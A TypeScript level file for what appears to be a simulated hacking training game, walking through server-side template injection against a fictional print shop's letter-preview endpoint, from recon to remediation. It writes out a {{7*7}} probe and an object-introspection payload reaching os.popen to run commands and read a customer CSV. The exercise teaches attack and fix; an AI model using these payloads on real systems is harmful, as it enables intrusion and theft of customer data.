import type { ChainDef } from "../../types";
import { match, cmd } from "../../engine";

const IP = "198.51.100.30";

export const mediumLevel5: ChainDef = {
  id: "medium-5",
  difficulty: "medium",
  order: 5,
  points: 90,
  title: "Rendered As Written",
  codename: "OPERATION RENDERED AS WRITTEN",
  summary: "A 'preview my letter' feature that renders user input as a template, not just text, will render anything you write into it.",
  briefing: [
    "Redwing Print & Mail runs direct-mail campaigns for small businesses out of southern Minnesota —",
    "personalized letters, printed and mailed by the thousand. Customers write their own letter",
    "templates in a web editor and preview them before a run goes to print.",
    "",
    "The preview renders server-side, using the same templating engine that generates the final",
    "documents. Find out whether it treats your input as data, or as instructions.",
  ],
  debrief: [
    "root cause: the letter-preview feature rendered user-supplied template syntax directly through the",
    "server-side templating engine with no sandboxing, allowing arbitrary expression evaluation and, from",
    "there, operating-system command execution — server-side template injection (CWE-1336).",
    "",
    "REDWING PRINT & MAIL: SECURED.",
  ],
  nodes: [
    {
      id: "redwing",
      org: "Redwing Print & Mail",
      city: "Red Wing",
      state: "MN",
      coords: { x: 44, y: 19 },
      ip: IP,
      tagline: "Direct-mail print house — customer letter-template editor",
      briefing: [
        "TARGET: Redwing Print & Mail letter-template preview service",
        `IP: ${IP}`,
        "KNOWN: public preview endpoint renders user-supplied template text server-side.",
        "",
        "Find out whether that render is sandboxed at all.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Preview feature has been 'basically the same code' since a contractor built it years ago.",
        "   Nobody's touched the templating library since.\" — dispatch",
      ],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "identify", label: "Discover the letter-preview endpoint's template parameter", tactic: "Discovery", requires: ["recon"] },
        { id: "poc", label: "Confirm template expressions are evaluated server-side", tactic: "Discovery", requires: ["identify"] },
        { id: "rce", label: "Escalate template evaluation into operating-system command execution", tactic: "Execution", requires: ["poc"] },
        { id: "loot", label: "Read the customer database from the compromised host", tactic: "Collection", requires: ["rce"] },
        { id: "secure", label: "Sandbox the templating engine and disable expression evaluation", tactic: "Remediation", requires: ["loot"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`. Then hit the web root and find the preview form's parameter name.",
        "Try a harmless arithmetic expression in the template field, like `{{7*7}}`. If the preview shows 49 instead of literally '{{7*7}}', the engine is evaluating your input, not just displaying it.",
        "TemplateForge (the engine this uses) exposes the underlying OS through object introspection. A payload that reaches `os.popen('id')` through the template's object chain will run that command on the server.",
        "You have code execution as the web service account. Look for anything resembling a customer database file on this host.",
      ],
      debrief: [
        "root cause: /preview?tpl= passed user input directly into TemplateForge's render function with no",
        "sandboxing, allowing expression evaluation and, via object introspection, arbitrary OS command",
        "execution as the web service account.",
        "fix applied: preview restricted to a sandboxed subset of the template language, no object",
        "introspection, no shell access from the render process.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT   STATE SERVICE VERSION",
              "80/tcp open  http    TemplateForge preview service 2.0",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds",
            ],
          }),
        }),
        cmd({
          id: "curl-root",
          tool: "curl",
          requires: [IP],
          forbids: ["preview?tpl="],
          help: "curl http://<ip>      — fetch the web root",
          requiresObjectives: ["recon"],
          run: () => ({
            completesObjective: "identify",
            tone: "success",
            setsFlags: ["found_preview"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Redwing Print & Mail — Letter Template Editor</title>",
              '<form action="/preview" method="GET"><textarea name="tpl"></textarea></form>',
              "",
              "tip: this renders through TemplateForge server-side. worth testing what it evaluates.",
            ],
          }),
        }),
        cmd({
          id: "ssti-poc",
          tool: "curl",
          requires: ["preview?tpl=", "7*7"],
          help: 'curl "http://<ip>/preview?tpl={{7*7}}"',
          requiresFlags: ["found_preview"],
          run: () => ({
            completesObjective: "poc",
            tone: "success",
            setsFlags: ["ssti_confirmed"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              "49",
              "",
              "[+] the template expression was evaluated server-side, not printed literally. this engine",
              "    executes, it doesn't just render.",
            ],
          }),
        }),
        cmd({
          id: "ssti-rce",
          tool: "curl",
          requires: ["preview?tpl=", "os.popen", "id"],
          help: 'curl "http://<ip>/preview?tpl={{ ().__class__.__base__.__subclasses__()[...].__init__.__globals__[\'os\'].popen(\'id\').read() }}"',
          requiresFlags: ["ssti_confirmed"],
          run: () => ({
            completesObjective: "rce",
            tone: "success",
            setsFlags: ["have_shell"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              "uid=33(www-data) gid=33(www-data) groups=33(www-data)",
              "",
              "[+] object introspection reached the OS module — arbitrary command execution confirmed.",
            ],
          }),
        }),
        cmd({
          id: "loot-customers",
          tool: "curl",
          requires: ["preview?tpl=", "customers.csv"],
          help: 'curl "http://<ip>/preview?tpl={{ ...os.popen(\'cat /var/www/data/customers.csv\').read() }}"',
          requiresFlags: ["have_shell"],
          run: () => ({
            completesObjective: "loot",
            tone: "success",
            note: "Redwing Print & Mail — full customer mailing-list database readable via SSTI-to-RCE",
            output: [
              "HTTP/1.1 200 OK",
              "",
              'name,address,campaign\n"[redacted]","[redacted]","spring_promo_2025"',
              "",
              "[!] the entire customer mailing list is reachable from a single unsandboxed preview field.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system         — sandbox the templating engine",
          requiresObjectives: ["loot"],
          deniedOutput: ["confirm the actual data exposure before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] restricted the preview renderer to a sandboxed template subset",
              "[+] disabled object introspection and shell access from the render process",
              "[+] documented as server-side template injection (CWE-1336)",
              "",
              "REDWING PRINT & MAIL: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
